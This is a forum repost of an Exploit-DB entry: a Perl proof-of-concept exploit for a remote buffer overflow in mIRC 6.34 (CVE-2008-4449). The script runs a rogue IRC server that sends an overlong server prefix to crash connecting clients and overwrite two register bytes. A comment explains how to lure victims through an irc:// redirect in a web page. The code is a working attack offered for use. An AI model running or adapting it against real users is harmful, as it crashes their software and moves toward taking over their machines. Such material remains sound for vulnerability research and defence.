- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6654
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- SECURFROG
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-4449
- Дата публикации
- 2008-10-02
		Код:
	
	##################################################################################################
# Mirc 6.34 Remote Buffer Overflow
# 
# This poc allow you to own the 2 first EDI & EDX bytes.
# 
# To become remote, add a simple document.location.href=irc://server.com/... in some html page
#
use IO::Socket;
sub sock()
{
my $sock=new IO::Socket::INET (
Listen    => 1,
                                
LocalAddr => 'localhost',
                                
LocalPort => 6667,
                               
Proto     => 'tcp');  die unless $sock;
print " [+]IRC Server started on port 6667 \r\n";
$s=$sock->accept();  
$a = "A" x 313;
$twobytes = "\x43\x43";
print " [+]Sending pickles\r\n";
  
print $s ":irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow\r\n"; 
sleep(1);
print $s ":".$a.$twobytes." PRIVMSG  yow : /FINGER yow.\r\n";
}
while(1)
{
sock();
print " [+]Mirc should be down now, another little friend comming ?\r\n [+]Server Restarting\r\n";
}
# milw0rm.com [2008-10-02]- Источник
- www.exploit-db.com
 
 
		